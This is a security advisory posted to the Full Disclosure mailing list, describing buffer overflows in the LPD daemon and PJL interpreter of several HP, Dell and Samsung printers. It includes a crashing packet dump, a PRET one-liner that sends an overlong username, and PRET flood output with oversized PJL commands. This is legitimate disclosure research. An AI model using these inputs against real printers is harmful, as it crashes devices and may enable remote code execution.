Date: Mon, 30 Jan 2017 13:43:49 +0100
From: Jens Müller <jens.a.mueller@....de>
To: fulldisclosure@...lists.org
Subject: [FD] Hacking Printers Advisory 4/6: Multiple vendors buffer
 overflow in LPD daemon and PJL interpreter

TL;DR:  In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 4 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
buffer overflows in the printer's LPD daemon and PJL interpreter which
leads to denial of service or potentially even to code execution. The
attack can be performed by anyone who can print, for example through USB
or network. It can even be carried out by a malicious website, using
cross-site printing techniques (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).

==================[ Buffer Overflow in LPD Service ]==================

-------------------------[ Affected Devices ]-------------------------

This vulnerability has been verfied for the devices listed below:

- HP LaserJet 1200 (Firmware version: M.22.09)
- HP LaserJet 4200N (Firmware version: 20050602)
- HP LaserJet 4250N (Firmware version: 20150130)
- Dell 3110cn (Firmware version: 200707111148)
- Samsung MultiPress 6345N (Firmware: 1.03.00.81)

More printers are likely to be affected.
Vendors informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

The printer's LPD service listening on port 515/tcp is prone to a buffer
overflow vulnerability. Sending 150 characters or more as username
operator of the control file's L command (print banner page) completely
crashes the device and requires a manual restart to get the printer back
to life. Given correct shellcode and return address, this vulnerability
may lead to remote code execution. A packet dump is shown below.

----------------------------------------------------------------------
> 02 6c 70 0a                                     .lp.
< 00                                              .
> 02 31 35 32 20 63 66 41 30 30 31 0a             .152 cfA001.
< 00                                              .
> 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 0a 00                      xxxxxxx..
----------------------------------------------------------------------

-------------------------[ Proof of Concept ]-------------------------

A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published, which includes a simple LPD fuzzer to
test for buffer overflows by setting all user inputs defined by the LPD
protocol to a certain value (in our case, Python output). The attack can
be reproduced as follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET/lpd/
$ ./lpdtest.py printer in "`python -c 'print "x"*150'`"

==================[ Buffer Overflow in PJL Interpreter ]==================

-------------------------[ Affected Devices ]-------------------------

This vulnerability has been verfied for the devices listed below:

- Dell 1720n (Firmware version: NM.NA.N099)

More printers are likely to be affected.

--------------------[ Vulnerability Description ]---------------------

Sending about 3.000 characters and more to the PJL interpreter crashes
the device and requires a manual restart to get the printer back to
life. Given correct shellcode and return address, this vulnerability
might even lead to remote code execution:

----------------------------------------------------------------------
@PJL SET 000000000000000000000000000000000000000000000000000000000…
----------------------------------------------------------------------

-------------------------[ Proof of Concept ]-------------------------

A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published. Testing a device buffer overflows in
the PJL interpreter can be done as follows:

$ cd ..
$ ./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"

-----------------------[ Further Information ]------------------------

Information on buffer overflows in printer devices can be found at:
http://hacking-printers.net/wiki/index.php/Buffer_overflows

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists